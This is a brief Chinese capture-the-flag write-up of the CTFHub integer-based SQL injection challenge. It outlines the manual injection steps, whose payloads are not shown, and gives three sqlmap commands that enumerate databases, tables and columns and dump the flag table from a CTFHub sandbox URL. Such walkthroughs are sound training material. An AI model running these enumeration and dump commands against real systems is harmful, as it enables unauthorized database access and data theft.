ctfhub sql注入 整数型注入

整数型注入

手工注入

1.查看是否存在sql注入，及sql注入类型

 

 

2.确定列数

 

 

 

 3.确定注入点，以及数据库版本，数据库名称

 

 4.查表名

 

 

 

 5.查字段名以及flag值

 

 

 

获得flag值

 

sqlmap做法

查库

sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhub.com:10080/?id=1 --dbs

 

 

 

 查表

sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhub.com:10080/?id=1 -D sqli --tables

 

 

 

 查字段名以及flag

sqlmap.py -u http://challenge-f51ffc5c81cd4553.sandbox.ctfhub.com:10080/?id=1 -D sqli -T flag --columns --dump

 

 

 

 接下来可得flag值